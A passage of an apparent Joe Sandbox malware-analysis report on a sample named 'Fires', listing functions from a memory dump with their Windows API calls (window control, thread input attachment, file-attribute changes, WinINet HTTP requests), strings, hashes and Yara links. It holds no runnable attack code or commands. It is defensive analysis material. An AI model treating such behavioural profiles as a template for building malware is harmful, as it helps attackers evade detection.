Instruction Fuzzy Hash: 096136B2504305AFCB10EF64C845A9EB7EDFF99310F04492AF98A87251DB31E945CBB2

Function 00D5FBC6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D839E2,00000004,00000000,00000000), ref: 00D5FC41
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,00D839E2,00000004,00000000,00000000), ref: 00D9FC15
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,00D839E2,00000004,00000000,00000000), ref: 00D9FC98

Strings

(, xrefs: 00D9FBC0

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ShowWindow
String ID: (
API String ID: 1268545403-2063206799
Opcode ID: 03a7a436407c33d828b7c054c8f52e33b62128574d25de481bfe7eced1c80ea5
Instruction ID: 74bbfe4bac512482c83bf96087ac359a65d0543b70d24e54e9b4362235197130
Opcode Fuzzy Hash: 03a7a436407c33d828b7c054c8f52e33b62128574d25de481bfe7eced1c80ea5
Instruction Fuzzy Hash: 8541EC306093889ECF358B3DC9C8B7A7B96AB46352F18453DED879EA64C631E448C731

Function 00DD46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00DD4715
SetMenu.USER32(?,00000000), ref: 00DD4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00DD47AC
IsMenu.USER32(?), ref: 00DD47C0
CreatePopupMenu.USER32 ref: 00DD47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00DD47F7
DrawMenuBar.USER32 ref: 00DD47FF

Strings

0, xrefs: 00DD46F0
F, xrefs: 00DD47EA

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: ee6a3bf7793763838822fe135d31010ad523eabae0750240032097d63003aa89
Instruction ID: fcde372a16a29ab23566403db95cdd2fde9307ee0d7b5e9153f80a61405fdc61
Opcode Fuzzy Hash: ee6a3bf7793763838822fe135d31010ad523eabae0750240032097d63003aa89
Instruction Fuzzy Hash: F6417A75A02309EFDF14CF64E844EAA7BB6FF4A314F18402AFA45A7350C770A914DB60

Function 00DA282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00DA28B1
GetDlgCtrlID.USER32 ref: 00DA28BC
GetParent.USER32 ref: 00DA28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00DA28DB
GetDlgCtrlID.USER32(?), ref: 00DA28E4
GetParent.USER32(?), ref: 00DA28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00DA28FB

Strings

ListBox, xrefs: 00DA286E
ComboBox, xrefs: 00DA2839

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 795494c922d2392984403cf7969992b0e7a7a1e7cbdd7c9ad90d7e680d223e4b
Instruction ID: b16c9b1fcfd0b7fa2f9082381019bf6c8fdc096b898aeaba8cf67c854b6c0216
Opcode Fuzzy Hash: 795494c922d2392984403cf7969992b0e7a7a1e7cbdd7c9ad90d7e680d223e4b
Instruction Fuzzy Hash: 8521AF74D00218BBCF04ABA5CC85EEEBBB9EF16310F100156F952A7291DB758818DF70

Function 00DA290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

Part of subcall function 00DA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00DA4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00DA2990
GetDlgCtrlID.USER32 ref: 00DA299B
GetParent.USER32 ref: 00DA29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00DA29BA
GetDlgCtrlID.USER32(?), ref: 00DA29C3
GetParent.USER32(?), ref: 00DA29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00DA29DA

Strings

ListBox, xrefs: 00DA294F
ComboBox, xrefs: 00DA291A

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: 150f5525e0fac4821f0ce1b6cf9236f5bc31e5db4f9a773908a3ec59251be5ab
Instruction ID: f7cb10b7e06ffba4afcb0bc08aaf4cfc93761e486d98f81eada83e80733d5477
Opcode Fuzzy Hash: 150f5525e0fac4821f0ce1b6cf9236f5bc31e5db4f9a773908a3ec59251be5ab
Instruction Fuzzy Hash: 3721A9B5D41218BBCF00ABA4CC85AFEBBB9EF15310F104057B992A72A1CB758908DF70

Function 00DD44BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00DD4539
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00DD453C
GetWindowLongW.USER32(?,000000F0), ref: 00DD4563
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00DD4586
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00DD45FE
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00DD4648
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00DD4663
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00DD467E
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00DD4692
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00DD46AF

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 27f148118de9c7c3f370e3e718f11c89974e1e2e8460ee182b7f5b09524cdbc0
Instruction ID: d33ef0dfe81d8464726170efad152170781f3404e0c2181ae7ccf12d6e538019
Opcode Fuzzy Hash: 27f148118de9c7c3f370e3e718f11c89974e1e2e8460ee182b7f5b09524cdbc0
Instruction Fuzzy Hash: E1617975A00208AFDB10DFA8CC81EEE77B8EB49710F14415AFA05E73A1C774A955DB60

Function 00DABAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00DABB18
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABB2C
GetWindowThreadProcessId.USER32(00000000), ref: 00DABB33
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABB42
GetWindowThreadProcessId.USER32(?,00000000), ref: 00DABB54
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABB6D
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABB7F
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABBC4
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABBD9
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00DAABA8,?,00000001), ref: 00DABBE4

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: acb3ea5ee1ec04579fdb1f9b1c54e52ffdf0315a7b4ab5c5766f0e8a451df227
Instruction ID: ffd42890d69d3393f6890186c9ea90e67e82e9b0130bdce6e713f5cc8d8238b2
Opcode Fuzzy Hash: acb3ea5ee1ec04579fdb1f9b1c54e52ffdf0315a7b4ab5c5766f0e8a451df227
Instruction Fuzzy Hash: 8731BFB2905308AFDB10DF16DC84FA937AAEB0A322F158016FA05E72E1C774D8458B72

Function 00D72FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D73007

Part of subcall function 00D72D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4), ref: 00D72D4E
Part of subcall function 00D72D38: GetLastError.KERNEL32(00E11DC4,?,00D7DB51,00E11DC4,00000000,00E11DC4,00000000,?,00D7DB78,00E11DC4,00000007,00E11DC4,?,00D7DF75,00E11DC4,00E11DC4), ref: 00D72D60

_free.LIBCMT ref: 00D73013
_free.LIBCMT ref: 00D7301E
_free.LIBCMT ref: 00D73029
_free.LIBCMT ref: 00D73034
_free.LIBCMT ref: 00D7303F
_free.LIBCMT ref: 00D7304A
_free.LIBCMT ref: 00D73055
_free.LIBCMT ref: 00D73060
_free.LIBCMT ref: 00D7306E

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 3e80cba4a0bda10efbc3fb85705b2fb912fd57e8b507ee1b1f6853f2ce66f045
Instruction ID: 962897a925e54cab68524f8fdd7aab2b4a973aff94a31d6fe9716debb42b21ac
Opcode Fuzzy Hash: 3e80cba4a0bda10efbc3fb85705b2fb912fd57e8b507ee1b1f6853f2ce66f045
Instruction Fuzzy Hash: 6E117476500148EFCB11EF95C842DED3BA5EF05350F9185A5FA0C9B222EA31EB519BB0

Function 00D42AB0 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00D42AF9
OleUninitialize.OLE32(?,00000000), ref: 00D42B98
UnregisterHotKey.USER32(?), ref: 00D42D7D
DestroyWindow.USER32(?), ref: 00D83A1B
FreeLibrary.KERNEL32(?), ref: 00D83A80
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D83AAD

Strings

close all, xrefs: 00D42AF4

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: c7fb6e5b90841f61261e681f8bbe1081551040a334d1b2b0442fcde02e28491e
Instruction ID: 0f837925b1c733495c671d7600830b2ee697cce455a1a668ae5341604a4e6612
Opcode Fuzzy Hash: c7fb6e5b90841f61261e681f8bbe1081551040a334d1b2b0442fcde02e28491e
Instruction Fuzzy Hash: 59D14871601212DFCB29EF14C895A69F7A5FF04B10F5542AEE84AAB261CB31ED12CF74

Function 00DB8835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00DB89F2
SetCurrentDirectoryW.KERNEL32(?), ref: 00DB8A06
GetFileAttributesW.KERNEL32(?), ref: 00DB8A30
SetFileAttributesW.KERNEL32(?,00000000), ref: 00DB8A4A
SetCurrentDirectoryW.KERNEL32(?), ref: 00DB8A5C
SetCurrentDirectoryW.KERNEL32(?), ref: 00DB8AA5
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DB8AF5

Strings

*.*, xrefs: 00DB8AAB

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 7740e3a0100abd62787136dc9ca03265b1eb2c30a43f716620ad3f23289a0476
Instruction ID: e854f85feafa64ad544419ec6625c3c4ee15b1ebfb5491a46cbe029246929c4b
Opcode Fuzzy Hash: 7740e3a0100abd62787136dc9ca03265b1eb2c30a43f716620ad3f23289a0476
Instruction Fuzzy Hash: 27815B72904345DBCF24EE54C444AAAB7ECBB89310F58482AF886D7250DB35D945EBB2

Function 00DD88F9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 193windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00DD8992
IsWindowEnabled.USER32(00000000), ref: 00DD899E
SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00DD8A79
SendMessageW.USER32(00000000,000000B0,?,?), ref: 00DD8AAC
IsDlgButtonChecked.USER32(?,00000000), ref: 00DD8AE4
GetWindowLongW.USER32(00000000,000000EC), ref: 00DD8B06
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00DD8B1E

Strings

(, xrefs: 00DD89D5

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: MessageSendWindow$ButtonCheckedEnabledLong
String ID: (
API String ID: 4072528602-2063206799
Opcode ID: 333bac2457634f4f2d9d7dfc46debd0e8338f2f1d394d417a60e9a54693f4d9e
Instruction ID: 41aa6dc1666e40d11edb3f9b32443e1b78183d3fbb7098b9117ffe2220cf927f
Opcode Fuzzy Hash: 333bac2457634f4f2d9d7dfc46debd0e8338f2f1d394d417a60e9a54693f4d9e
Instruction Fuzzy Hash: 9771B074604204AFDF229F54CC95FBABBB9EF49300F18149BE985A7361CB31A940EB71

Function 00D47447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00D474D7

Part of subcall function 00D47567: GetClientRect.USER32(?,?), ref: 00D4758D
Part of subcall function 00D47567: GetWindowRect.USER32(?,?), ref: 00D475CE
Part of subcall function 00D47567: ScreenToClient.USER32(?,?), ref: 00D475F6

GetDC.USER32 ref: 00D86083
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00D86096
SelectObject.GDI32(00000000,00000000), ref: 00D860A4
SelectObject.GDI32(00000000,00000000), ref: 00D860B9
ReleaseDC.USER32(?,00000000), ref: 00D860C1
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00D86152

Strings

U, xrefs: 00D86021

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 0184507765eb530f1fc055104a14cb4c8c1db4210d6e050c67b3fd7eae9ca971
Instruction ID: 0749426010b5fb313f79cc267d8811ed706a007a5d160a11f43344903834e39d
Opcode Fuzzy Hash: 0184507765eb530f1fc055104a14cb4c8c1db4210d6e050c67b3fd7eae9ca971
Instruction Fuzzy Hash: 22719E31500305EFCF25AF64CC89ABA7BB6FF49321F18466AE9955A2A7C731C844DB70

Function 00DBCC98 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00DBCCB7
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00DBCCDF
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00DBCD0F
GetLastError.KERNEL32 ref: 00DBCD67
SetEvent.KERNEL32(?), ref: 00DBCD7B
InternetCloseHandle.WININET(00000000), ref: 00DBCD86

Strings

, xrefs: 00DBCD00

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: f88523f5faa5580f29af16c7263959ad9644cbba19d0547c2568994285c2c152
Instruction ID: 6e72f46479b667a77aff164923bdd8f8e4a45ff527c0e4e8cc8c502a097bb752
Opcode Fuzzy Hash: f88523f5faa5580f29af16c7263959ad9644cbba19d0547c2568994285c2c152
Instruction Fuzzy Hash: 8D315AB5611308EFDB21AF658C88AEB7BBDFB45B40B14552AB487D2200DB34E9049BB1

Function 00DAA215 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00D855AE,?,?,Bad directive syntax error,00DDDCD0,00000000,00000010,?,?), ref: 00DAA236
LoadStringW.USER32(00000000,?,00D855AE,?), ref: 00DAA23D

Part of subcall function 00D4B329: _wcslen.LIBCMT ref: 00D4B333

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00DAA301

Strings

Line %d (File "%s"):, xrefs: 00DAA2A7
%s (%d) : ==> %s.: %s %s, xrefs: 00DAA26B
Error: , xrefs: 00DAA2CF
., xrefs: 00DAA2E7
Line %d:, xrefs: 00DAA28C

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 078c618df0b3c9963d1a2aedd015a7722b07d21561be4513ebf2901875658cf8
Instruction ID: 8602cdb101d9939a84ed1b4607892369313d1da70dd236876861cd4c9fdd8522
Opcode Fuzzy Hash: 078c618df0b3c9963d1a2aedd015a7722b07d21561be4513ebf2901875658cf8
Instruction Fuzzy Hash: 36213E7180031EAFCF12ABA4CC06EEE7B79FF19700F044466B516650A2EB71E658DB71

Function 00DA29EC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00DA29F8
GetClassNameW.USER32(00000000,?,00000100), ref: 00DA2A0D
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00DA2A9A

Strings

SHELLDLL_DefView, xrefs: 00DA2A19
largeicons, xrefs: 00DA2A2E
list, xrefs: 00DA2A7C
smallicons, xrefs: 00DA2A62
details, xrefs: 00DA2A48

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: ce751742192f52c900258c205209ce3eb97855f3c81cda2666abda5e8e78894f
Instruction ID: 21d69c06d51340e7816685871424009406b4e7712e73cef4fe6bafaf129803f6
Opcode Fuzzy Hash: ce751742192f52c900258c205209ce3eb97855f3c81cda2666abda5e8e78894f
Instruction Fuzzy Hash: 0B11E9B6644307BAFA24672AEC07EB7779DDF16724B200012F905F50D1FB65E8514974

Function 00D47567 Relevance: 13.8, APIs: 9, Instructions: 291COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00D4758D
GetWindowRect.USER32(?,?), ref: 00D475CE
ScreenToClient.USER32(?,?), ref: 00D475F6
GetClientRect.USER32(?,?), ref: 00D4773A
GetWindowRect.USER32(?,?), ref: 00D4775B

Memory Dump Source

Source File: 0000000C.00000002.2221168691.0000000000D41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D40000, based on PE: true

Associated: 0000000C.00000002.2221145885.0000000000D40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000DDD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221234232.0000000000E03000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221283723.0000000000E0D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000C.00000002.2221306370.0000000000E15000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_d40000_Fires.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 83e95f93bfcdfff70056cdb90d714d2bfd17b2dcadf81e098bf46309c9fc413a
Instruction ID: 4962e27103469df5a88f74b23f65587c16c32cdaac7882f2edef11c54566b9cc
